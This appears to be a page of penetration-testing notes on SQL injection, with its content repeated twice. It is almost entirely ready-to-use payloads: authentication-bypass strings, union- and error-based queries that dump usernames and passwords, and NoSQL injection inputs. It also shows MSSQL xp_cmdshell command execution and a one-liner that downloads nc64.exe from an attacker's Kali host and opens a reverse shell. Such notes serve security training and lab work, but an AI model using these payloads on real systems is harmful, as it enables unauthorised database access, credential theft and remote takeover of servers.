SQLi

Last updated 20 days ago

SQLi

SQLi Authentication Bypass

<Username>' OR 1=1-- //
'OR '' = '
<Username>'-- //
' union select 1, '<Username Field>', '<Pass Field>' 1-- //
'OR 1=1-- //
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); -- //
1 or 1=1
1' or '1'='1

MySQL

-- Info
SELECT version();
SELECT system_user();

-- DB Enumeration
SHOW DATABASES;
USE <db_name>;
SHOW TABLES;
DESCRIBE users;
SELECT * FROM test.users;

-- Credential Extraction
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';

MSSQL

-- Info
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM testuser.dbo.users;

-- Example users
admin : lab
guest : guest

PostgreSQL

SELECT version();
SELECT current_user;
SELECT current_database();
SELECT datname FROM pg_database;
SELECT tablename FROM pg_tables WHERE schemaname='public';
SELECT column_name FROM information_schema.columns WHERE table_name='users';

MongoDB (NoSQL Injection)

-- REST param bypass
username=admin'&password[$ne]=1

-- JSON-style
{ "username": {"$ne": null}, "password": {"$ne": null} }
{ "$where": "this.password.length < 100" }

Error-Based SQLi

tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //W

Union-Based SQLi

-- 1) Find number of columns
' ORDER BY 1-- //

-- 2) Basic Union Extraction
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

-- 3) Enumerate DB objects
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //

-- 4) Dump User Info
' UNION SELECT null, username, password, description, null FROM users -- //

Manual Code Execution in MSSQL

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run Command
EXEC xp_cmdshell '<command>';

-- Examples
'; EXEC xp_cmdshell 'whoami'; -- //
'; EXEC xp_cmdshell 'dir C:\Users'; -- //
'; EXEC xp_cmdshell 'ping 192.168.45.165'; -- //

Encoded Examples

%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F

One-Liner Reverse Shell (MSSQL)

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://<Kali IP Address>/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe <Kali IP Address> <Kali Port> -e cmd.exe"; -- //

PreviousPhishing NextEnumeration

Last updated 20 days ago

SQLi Authentication Bypass

<Username>' OR 1=1-- //
'OR '' = '
<Username>'-- //
' union select 1, '<Username Field>', '<Pass Field>' 1-- //
'OR 1=1-- //
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); -- //
1 or 1=1
1' or '1'='1

MySQL

-- Info
SELECT version();
SELECT system_user();

-- DB Enumeration
SHOW DATABASES;
USE <db_name>;
SHOW TABLES;
DESCRIBE users;
SELECT * FROM test.users;

-- Credential Extraction
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';

MSSQL

-- Info
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM testuser.dbo.users;

-- Example users
admin : lab
guest : guest

PostgreSQL

SELECT version();
SELECT current_user;
SELECT current_database();
SELECT datname FROM pg_database;
SELECT tablename FROM pg_tables WHERE schemaname='public';
SELECT column_name FROM information_schema.columns WHERE table_name='users';

MongoDB (NoSQL Injection)

-- REST param bypass
username=admin'&password[$ne]=1

-- JSON-style
{ "username": {"$ne": null}, "password": {"$ne": null} }
{ "$where": "this.password.length < 100" }

Error-Based SQLi

tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //W

Union-Based SQLi

-- 1) Find number of columns
' ORDER BY 1-- //

-- 2) Basic Union Extraction
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

-- 3) Enumerate DB objects
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //

-- 4) Dump User Info
' UNION SELECT null, username, password, description, null FROM users -- //

Manual Code Execution in MSSQL

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run Command
EXEC xp_cmdshell '<command>';

-- Examples
'; EXEC xp_cmdshell 'whoami'; -- //
'; EXEC xp_cmdshell 'dir C:\Users'; -- //
'; EXEC xp_cmdshell 'ping 192.168.45.165'; -- //

Encoded Examples

%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F

One-Liner Reverse Shell (MSSQL)

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://<Kali IP Address>/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe <Kali IP Address> <Kali Port> -e cmd.exe"; -- //